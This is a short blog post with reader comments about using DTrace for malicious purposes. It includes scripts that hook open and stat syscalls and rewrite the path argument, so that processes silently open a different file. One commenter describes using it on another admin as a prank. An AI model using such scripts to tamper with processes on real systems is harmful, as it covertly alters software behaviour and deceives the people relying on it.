Malicious DTrace
One of the great things about being bored sitting at a datacenter waiting for long processes to finish is the opportunity to fill that mind-numbing boredom with useful knowledge. I spent the past little while learning DTrace. I gotta say, I love it. The SolarisInternals site has many good scripts to help teach DTrace. One of the things I'd like to do with DTrace is use it for malicious purposes. In my linux days, I authored a project called Project Hijack, which allows an attacker to effortlessly inject arbitrary code into a process during runtime and hijack dynamically loaded functions. I'd like to port that project, or as much of it as possible, to DTrace.
It took me about 30 minutes to be comfortable writing simple DTrace scripts. Here's one tiny malicious script I wrote:
syscall::open:entry
/copyinstr(arg0) == "/tmp/mal.txt"/
{
copyoutstr("/tmp/haha.txt", arg0, strlen("/tmp/haha.txt"));
}
Any time an application tries to open /tmp/mal.txt, the application will actually open /tmp/haha.txt. This script is simple--the reason why I really love DTrace.
I'll write more about it later. The processes I'm running on our production server is almost finished. Also, I'll be at Defcon. If you wanna meet up, let me know. Drop a comment or send me an email.
AddToAny
Powered By:
Comments
Improvement
syscall::open:entry
/copyinstr(arg0) == $1/
{
copyoutstr($2, arg0, strlen($1) > strlen($2) ? strlen($1) : strlen($2));
}
OpenSolaris Version
When I originally wrote this article, I tested the scripts on OSX. However, when I tried it on OpenSolaris b134, it didn't work. Here's the revised version that works on OpenSolaris:
syscall::open:entry, syscall::stat:entry, syscall::stat64:entry
/copyinstr(arg0) == $1/
{
copyoutstr($2, arg0, (strlen($1) > strlen($2)) ? strlen($1)+1 : strlen($2)+1);
}
Need open64 on some systems
Simple fun, pulled this on another admin today, oh the craziness that ensued...